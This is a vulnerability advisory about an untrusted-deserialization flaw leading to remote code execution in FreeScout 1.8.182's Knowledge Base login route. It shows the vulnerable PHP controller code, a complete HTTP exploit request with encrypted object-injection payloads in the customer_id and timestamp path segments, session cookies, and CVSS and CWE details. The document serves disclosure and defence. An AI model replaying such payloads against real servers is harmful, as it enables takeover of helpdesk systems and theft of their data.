public function customerLoginFromEmail(Request $request, $mailbox_id, $customer_id, $hash, $timestamp)
{
$result = [
'result' => 'error',
'message' => __('Invalid authentication link'),
];
$mailbox = $this->processMailboxId($mailbox_id);
if (!$mailbox) {
abort(404);
}
// Authenticate customer.
$customer_id = \Helper::decrypt($customer_id);
$timestamp = \Helper::decrypt($timestamp);
try {
$auth_redirect = \Kb::authenticate($customer_id, $mailbox->id, $hash, $timestamp);
if ($auth_redirect) {
return $auth_redirect;
}
} catch (\Exception $e) {
if ($e->getCode() == 300) {
$result['message'] = $e->getMessage();
}
}
return view('knowledgebase::customer_login', [
'mailbox' => $mailbox,
'result' => $result,
]);
}
GET /hc/1132419419/auth/eyJpdiI6ICJyYkdxbk9RQ0MrbFZkZTdFVFdRbnF3PT0iLCAidmFsdWUiOiAidHlFbjlZRzdUL3pMUjJVMGRKelQydlpCZDNkV0FpRS8zZ0ViRFRycXdXQUdJZ3EyTjFuYytEc0ZPMFU2TXBPdFRlMGNwYkIwVUhOSHJqTmg1YTU5bmYzV1pwVnhKc1BiNFN4L0ZYZDJualNKbHBvYTN3Mm02RHJoVzN2R2ZjUHA5NlFXQXNtYzFyd0YreWN3TFFLVU1mamVORnRNNytmY0hTQWZCOEpkL3R2bml0MU1TaW93OERuSkxCRFM0RVlVcTEyWitNTE9sY2hPK01pL3Jnb3U5d3BUc3RLRVVLNUx5bjdONitGKzFkSzA0UFFyT2s3cGZBaGhOL2NLVy84MXdpUzZWS2twb0k0RVp3d2pxcnBPUEdGU0VuZTNFWHNlUzFzejFyL2xyWHR4UHpCUjYzNTc1OGxtd1VCQlVZQTVOdnEzcjBrY3Ftb0h6R1JDTG9pTnZ3PT0iLCAibWFjIjogIjZiYjY2MWU1N2Y2MTg3MDFjYmNhYjc3ZmFkNTRlMTU4ZTc5OTc1YjZlMmYxMGRkNWRlMjVmOGYyNWY0MWFlMDYiLCAidGFnIjogIiJ9/eyJpdiI6ICJyYkdxbk9RQ0MrbFZkZTdFVFdRbnF3PT0iLCAidmFsdWUiOiAidHlFbjlZRzdUL3pMUjJVMGRKelQydlpCZDNkV0FpRS8zZ0ViRFRycXdXQUdJZ3EyTjFuYytEc0ZPMFU2TXBPdFRlMGNwYkIwVUhOSHJqTmg1YTU5bmYzV1pwVnhKc1BiNFN4L0ZYZDJualNKbHBvYTN3Mm02RHJoVzN2R2ZjUHA5NlFXQXNtYzFyd0YreWN3TFFLVU1mamVORnRNNytmY0hTQWZCOEpkL3R2bml0MU1TaW93OERuSkxCRFM0RVlVcTEyWitNTE9sY2hPK01pL3Jnb3U5d3BUc3RLRVVLNUx5bjdONitGKzFkSzA0UFFyT2s3cGZBaGhOL2NLVy84MXdpUzZWS2twb0k0RVp3d2pxcnBPUEdGU0VuZTNFWHNlUzFzejFyL2xyWHR4UHpCUjYzNTc1OGxtd1VCQlVZQTVOdnEzcjBrY3Ftb0h6R1JDTG9pTnZ3PT0iLCAibWFjIjogIjZiYjY2MWU1N2Y2MTg3MDFjYmNhYjc3ZmFkNTRlMTU4ZTc5OTc1YjZlMmYxMGRkNWRlMjVmOGYyNWY0MWFlMDYiLCAidGFnIjogIiJ9/eyJpdiI6ICJyYkdxbk9RQ0MrbFZkZTdFVFdRbnF3PT0iLCAidmFsdWUiOiAidHlFbjlZRzdUL3pMUjJVMGRKelQydlpCZDNkV0FpRS8zZ0ViRFRycXdXQUdJZ3EyTjFuYytEc0ZPMFU2TXBPdFRlMGNwYkIwVUhOSHJqTmg1YTU5bmYzV1pwVnhKc1BiNFN4L0ZYZDJualNKbHBvYTN3Mm02RHJoVzN2R2ZjUHA5NlFXQXNtYzFyd0YreWN3TFFLVU1mamVORnRNNytmY0hTQWZCOEpkL3R2bml0MU1TaW93OERuSkxCRFM0RVlVcTEyWitNTE9sY2hPK01pL3Jnb3U5d3BUc3RLRVVLNUx5bjdONitGKzFkSzA0UFFyT2s3cGZBaGhOL2NLVy84MXdpUzZWS2twb0k0RVp3d2pxcnBPUEdGU0VuZTNFWHNlUzFzejFyL2xyWHR4UHpCUjYzNTc1OGxtd1VCQlVZQTVOdnEzcjBrY3Ftb0h6R1JDTG9pTnZ3PT0iLCAibWFjIjogIjZiYjY2MWU1N2Y2MTg3MDFjYmNhYjc3ZmFkNTRlMTU4ZTc5OTc1YjZlMmYxMGRkNWRlMjVmOGYyNWY0MWFlMDYiLCAidGFnIjogIiJ9 HTTP/1.1
Host: freescout.web-hacks.ru
Cookie: laravel_session=eyJpdiI6IjNqYTM3SjB1S3htZnZaZG9tWEZcL3VnPT0iLCJ2YWx1ZSI6IjVtRFhvaXlVV1FjdkpqdVRrTnU4dTBZQSswODNERzdyanZvdjZTaytWeExveFNJUUhPdEJGbzNyXC9vYU5tVUo1NjNxT1dtTlwvb0pLcGxSQWdseVlIeVpMTnNKcFlEbEtMbTdtMVJaTWFpdHp3QUZxSUNlQlBkN0lKMjl5SVNYNU8iLCJtYWMiOiI1MDE5ZjNhNTlhZWU5NGQ0Yzc1NDY2Y2Q2ZWU2Y2I5OTE2MzhlNWNiZjMxZGE2ZWI2NWFkMDQwMDY5NjMxZGVkIn0%3D; enduserportal_auth=eyJpdiI6InJVZGRXSzZlWkIwZGlcL2FlZ3lraDVBPT0iLCJ2YWx1ZSI6IkFPc1BjVUZVZHBXUVRzZEZaeTVoWGc3Z3V4SklvYVhjSTVQbkJHNmgxVHk5aDMrd1JyRTM4U3pmdERtdk9YblBDd0Q1dnQwWWd6UHFDeURjek12d1cxbVVkOG9DQlMrKzhmcnhZYWxHZm1VeDJHeE9iRENRcDlFcUxcL0pFdTJDMkhMMHhtUnJYWkczV0FLT3E5MGxyc2VZOVR3WUpINHIyZld0SlI2bEZVdXljZmowZ1wvNDJBQ24wbFwvcVIxMnluRVhyVVNlUDcwaXBGcU5QU0xGU0s1dzQ2T0FPTmJlTTFacDZJc0ZmaHlXU3VkRHl4alBhM3BCMVZxVTBcL0QydkV4d0xrdEMxSDlOZjhRZks4VWMyc3VSZ05lZ2xxME1uNjJBMFRRNTU5YUFEaFlvU1I0dDhLVFhiSUNNWEFcLzFYTVFwUnVUakVGYWRvNVg1NzhPUFZTMGVaVDMwY3pibDFTOHpQYXBrM0pTS2VVPSIsIm1hYyI6IjQzZmQ3YzYxMTc1YzQwZDYzNGFhZTM2YWUxMmM1Nzg2ZjA1ZmI1YzcxZjc5NGYxOTA0NGQ0NzJlMmY2ZmU3NWMifQ%3D%3D; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IkNQRTJZZlhZQ0RPU2tYbnhnMHpqMkE9PSIsInZhbHVlIjoib3RRVXlScmZlWE5jSjNIYTFXcGQ5RWV2N1JSTGkxMlwvT3JXT2JtR1dMWDRZcUJNdEh0SnUzNEdHcU5CREcxV3hiZnhxRm0zRlMxUmxwKzdsXC84QitVODdFYTZpTG1ERFZPQWs4c3lOZVJaeGE2MWx6K21WcUtxdHR5MlB0Q3JINkk1NWFkbHNCMXN6NFg3czRzVVRkZzNcL0w0SVwvTjBUXC9yZkJPUjJEVExYS005UHkrTFBVRW5KdENBRTFhU25MRXh4dHdiZFlPXC9vREJiWURGeW1lQms3d01CVDVTVFQySCtKQ0dubXROYlE5MD0iLCJtYWMiOiI4YzMwMWQ4NTc4YWE4YmEwZWI1MmMyMjUxMWRjOTc4NjNhNzE3MjkzM2M4NGIwYWMwNmI3MGY4YmE5OTc1NTQ3In0%3D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
Deserialization of untrusted data leads to Remote code execution [4]
Product: FreeScout
Version: 1.8.182
CWE-ID:
• CWE-502: Deserialization of Untrusted Data
• CAPEC-586: Object Injection
CVSS vector v.4.0: 7.0 (AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N)
Description: The application performs deserialization of data that can be tampered with. An attacker can create objects of arbitrary classes, as well as fully control their properties, thereby allowing them to manipulate the web application's logic.
Vulnerable scenarios:
• /hc/{mailbox_id}/auth/{customer_id}/{hash}/{timestamp}
• /{kb_locale}/hc/{mailbox_id}/auth/{customer_id}/{hash}/{timestamp}
Vulnerable parameters:
• GET timestamp
• GET customer_id
Exploitation conditions: Admin rights, APP_KEY knowledge, Knowledge Base Module installed
Researchers: Daniil Satyaev, Roman Cheremnykh, Artem Danilov (Positive Technologies)
Research
Vulnerable code:
Listing Code snippet exploiting the vulnerable function Helper::decrypt (Modules\KnowledgeBase\Http\Controllers\KnowledgeBaseController.php)
Exploitation scenario:
Listing HTTP-request to exploit «Deserialization of untrusted data»